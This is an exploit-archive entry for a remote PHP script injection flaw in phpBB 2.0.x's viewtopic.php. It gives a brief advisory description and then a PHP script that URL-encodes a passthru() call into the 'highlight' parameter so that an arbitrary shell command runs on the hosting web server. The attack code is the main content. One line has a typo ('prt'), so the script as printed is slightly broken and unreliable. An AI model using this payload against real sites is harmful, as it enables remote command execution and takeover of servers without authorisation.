phpBB 2.0.x - viewtopic.php PHP Script Injection

2004-07-12T00:00:00
ID EXPLOITPACK:63B2E805A4DB787E91AC7A8841F8A041
Type exploitpack
Reporter sasan hezarkhani
Modified 2004-07-12T00:00:00

Description

phpBB 2.0.x - viewtopic.php PHP Script Injection

                                        
                                            source: https://www.securityfocus.com/bid/10701/info

The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to construct dynamically generated web pages.

Exploiting this issue may allow a remote attacker to execute arbitrary commands in the context of the webserver that is hosting the vulnerable software. 

<?
$rush='ls -al'; //do what
$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch

print "?t=%37&rush=";

for ($i=0; $i<strlen($rush); ++$i) {
 print '%' . bin2hex(substr($rush,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
 prt '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>